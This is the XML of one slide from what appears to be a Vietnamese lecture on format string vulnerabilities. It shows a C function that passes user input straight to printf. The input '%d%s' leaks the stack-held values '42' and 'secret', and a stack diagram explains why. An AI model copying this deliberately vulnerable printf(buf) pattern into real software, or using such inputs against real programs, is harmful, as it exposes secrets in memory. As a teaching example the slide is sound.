        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19524741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BF10-BC95-3182-E22A-73B6CEE0E3A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lỗ hổng xâu định dạng: Ví dụ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAFD5710-3EC9-5A53-E85A-23EFD7EC2281}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1117346"/>
            <a:ext cx="8229600" cy="5359654"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Đọc dữ liệu nhạy cảm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03638322-BD3C-DE3F-D27F-75A3AAA542DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Google Shape;275;p38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA748662-991F-B8DB-44D8-E23C38D8D7B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="90275" y="2008868"/>
            <a:ext cx="4253117" cy="2123628"/>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char buf[64];</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void vulnerable(void) {</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Pts val="1100"/>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char *secret_string = "secret";</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int secret_number = 42;</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if (fgets(buf, 64, stdin) == NULL)</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return;</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    printf(buf);</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400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;276;p38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8751613-1485-82E6-1730-E9864ABED165}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5919649" y="2580824"/>
            <a:ext cx="366739" cy="2921255"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11083" h="58539" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="11083" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="58539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9378" y="58539"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="14" name="Google Shape;277;p38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{176C6A5B-4158-9B23-451D-283156249746}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1217408495"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6286375" y="1524000"/>
          <a:ext cx="2186100" cy="2921255"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="546525">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="546525">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="546525">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="546525">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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RIP of vulnerable</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SFP of vulnerable</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secret_string</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secret_number</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rgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>&amp;buf [arg to printf]</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1">
                        <a:solidFill>
                          <a:srgbClr val="FF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RIP of printf</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52550">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SFP of printf</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83175">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[printf frame]</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Courier New"/>
                        <a:ea typeface="Courier New"/>
                        <a:cs typeface="Courier New"/>
                        <a:sym typeface="Courier New"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18275" marR="18275"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5" name="Google Shape;278;p38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E67D7298-5922-1089-8322-E874AC42AEB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2555726112"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6286375" y="4734225"/>
          <a:ext cx="2186100" cy="1219040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="546525">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="546525">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="546525">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="546525">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="241600">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'\0'</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marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pP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marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pP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marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pP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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="241600">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'd'</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marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="CC0000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'s'</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1">
                        <a:solidFill>
                          <a:srgbClr val="CC0000"/>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92186112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'e'</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't'</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'\0'</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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1525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'r'</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'c'</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'e'</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None/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'s'</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Courier New"/>
                        <a:ea typeface="Courier New"/>
                        <a:cs typeface="Courier New"/>
                        <a:sym typeface="Courier New"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18275" marR="182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EEE"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;279;p38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8EE09D6-B820-9CD6-F3B1-E73F280AC718}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6072049" y="3231345"/>
            <a:ext cx="214347" cy="1711680"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11083" h="58539" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="11083" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="58539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9378" y="58539"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Google Shape;286;p39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12A74206-FB67-A1E8-85F3-3EBA486B8786}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="90275" y="1550961"/>
            <a:ext cx="1338900" cy="430857"/>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sz="160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Input: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>%d%s</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Google Shape;289;p39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E04BCAB-5A95-F72F-0252-F9A6C595E40F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76279" y="4271010"/>
            <a:ext cx="4495721" cy="1169521"/>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just" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Với</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> đối số truyền vào, hàm</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>printf("%d%s")</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> được</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> thực thi. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>rintf nhận đối số arg0, và thấy có 2 ký tự định dạng, vì vậy sẽ “trông chờ” thêm 2 đối số arg1 và arg2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Google Shape;293;p39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6514AA85-2BA0-8D06-CF36-FF456B9E9BF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8453840" y="2990385"/>
            <a:ext cx="63885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t>arg0</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Google Shape;294;p39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F7ECDD0-DA39-6715-0021-9F684F77D366}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8453840" y="2657025"/>
            <a:ext cx="63885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t>arg1</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Google Shape;295;p39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09072B4A-FDFA-0725-85B7-86DEC48C6317}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8453840" y="2352225"/>
            <a:ext cx="63885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t>arg2</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Google Shape;293;p39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{553AB62B-206E-9C52-73F1-685E49E26DBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="4774074"/>
            <a:ext cx="63885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a:t>buf</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Google Shape;286;p39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73C1CB79-CEE1-AA78-5E67-006BDB488204}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="90275" y="5748430"/>
            <a:ext cx="2905932" cy="430857"/>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0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Output: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>42secret</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-GB" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Left Brace 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9085CBE7-5A0A-DE78-ADC2-327604A956CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5509399" y="1524000"/>
            <a:ext cx="281801" cy="1533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Left Brace 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1D5DB80-15D4-1845-F6F8-D8D8764533FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5509399" y="3094009"/>
            <a:ext cx="281801" cy="13512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32DAA07F-CDE6-0619-C09A-26FEFB4EF4BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4364686" y="1906844"/>
            <a:ext cx="1447800" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>vulnerable()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>stack frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
